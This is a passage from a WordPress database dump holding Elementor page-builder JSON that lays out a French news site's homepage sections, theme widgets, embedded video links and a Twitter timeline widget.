":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2383,765,'_elementor_version','0.4'),(2384,765,'_elementor_css','a:3:{s:4:\"time\";i:1509371505;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2386,766,'_elementor_edit_mode','builder'),(2387,766,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"250\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\